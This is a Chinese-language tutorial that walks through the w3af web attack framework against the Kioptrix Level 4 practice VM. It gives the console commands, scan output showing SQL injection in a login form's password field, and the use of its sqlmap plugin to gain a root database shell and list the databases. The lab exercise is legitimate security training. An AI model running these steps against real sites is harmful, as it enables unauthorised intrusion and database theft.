w3af简单使用教程
line 2012-08-25 10:41:36 1751602
w3af是一个Web应用程序攻击和检查框架.该项目已超过130个插件,其中包括检查网站爬虫,SQL注入(SQL Injection),跨站(XSS),本地文件包含(LFI),远程文件包含(RFI)等.该项目的目标是要建立一个框架,以寻找和开发Web应用安全漏洞,所以很容易使用和扩展.
0x00 概述
在BackTrack5R3下使用w3af测试Kioptrix Level 4的SQL注入漏洞.
0x01 简介
w3af是一个Web应用程序攻击和检查框架.该项目已超过130个插件,其中包括检查网站爬虫,SQL注入(SQL Injection),跨站(XSS),本地文件包含(LFI),远程文件包含(RFI)等.该项目的目标是要建立一个框架,以寻找和开发Web应用安全漏洞,所以很容易使用和扩展.
0x02 安装
root@bt:~# apt-get install w3af
0x03 启动
root@bt:~# cd /pentest/web/w3af/ root@bt:/pentest/web/w3af# ./w3af_console
0x04 漏洞扫描配置
w3af>>> plugins //进入插件模块 w3af/plugins>>> list discovery //列出所有用于发现的插件 w3af/plugins>>> discovery findBackdoor phpinfo webSpider //启用findBackdoor phpinfo webSpider这三个插件 w3af/plugins>>> list audit //列出所有用于漏洞的插件 w3af/plugins>>> audit blindSqli fileUpload osCommanding sqli xss //启用blindSqli fileUpload osCommanding sqli xss这五个插件 w3af/plugins>>> back //返回主模块 w3af>>> target //进入配置目标的模块 w3af/config:target>>> set target http://192.168.244.132/ //把目标设置为http://192.168.244.132/ w3af/config:target>>> back //返回主模块
0x05 漏洞扫描
w3af>>> start
--- New URL found by phpinfo plugin: http://192.168.244.132/ New URL found by phpinfo plugin: http://192.168.244.132/checklogin.php New URL found by phpinfo plugin: http://192.168.244.132/index.php New URL found by webSpider plugin: http://192.168.244.132/ New URL found by webSpider plugin: http://192.168.244.132/checklogin.php New URL found by webSpider plugin: http://192.168.244.132/index.php Found 3 URLs and 8 different points of injection. The list of URLs is: - http://192.168.244.132/index.php - http://192.168.244.132/checklogin.php - http://192.168.244.132/ The list of fuzzable requests is: - http://192.168.244.132/ | Method: GET - http://192.168.244.132/ | Method: GET | Parameters: (mode="phpinfo") - http://192.168.244.132/ | Method: GET | Parameters: (view="phpinfo") - http://192.168.244.132/checklogin.php | Method: GET - http://192.168.244.132/checklogin.php | Method: POST | Parameters: (myusername="", mypassword="") - http://192.168.244.132/index.php | Method: GET - http://192.168.244.132/index.php | Method: GET | Parameters: (mode="phpinfo") - http://192.168.244.132/index.php | Method: GET | Parameters: (view="phpinfo") Blind SQL injection was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The injectable parameter is: "mypassword". This vulnerability was found in the requests with ids 309 to 310. A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "supplied argument is not a valid MySQL". The error was found on response with id 989. A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "mysql_". The error was found on response with id 989. SQL injection in a MySQL database was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The sent post-data was: "myusername=John&Submit=Login&mypassword=d'z"0". The modified parameter was "mypassword". This vulnerability was found in the request with id 989. Scan finished in 19 seconds. --- //开始扫描
0x06 漏洞利用配置
w3af>>> exploit //进入漏洞利用模块 w3af/exploit>>> list exploit //列出所有用于漏洞利用的插件 w3af/exploit>>> exploit sqlmap //使用sqlmap进行SQL注入漏洞的测试
--- Trying to exploit using vulnerability with id: [1010, 1011]. Please wait... Vulnerability successfully exploited. This is a list of available shells and proxies: - [0] <sql object ( dbms: "MySQL >= 5.0.0" | ruser: "root@localhost" )> Please use the interact command to interact with the shell objects. --- //测试存在SQL注入漏洞 //这里要记住shell objects(这里是0),等一下要用到 0x07 漏洞利用 w3af/exploit>>> interact 0 //interact + shell object就可以利用了 --- Execute "exit" to get out of the remote shell. Commands typed in this menu will be run through the sqlmap shell w3af/exploit/sqlmap-0>>> --- //sqlmap的一个交互式模块 w3af/exploit/sqlmap-0>>> dbs --- Available databases: [3]: [*] information_schema [*] members [*] mysql --- //成功获得数据库信息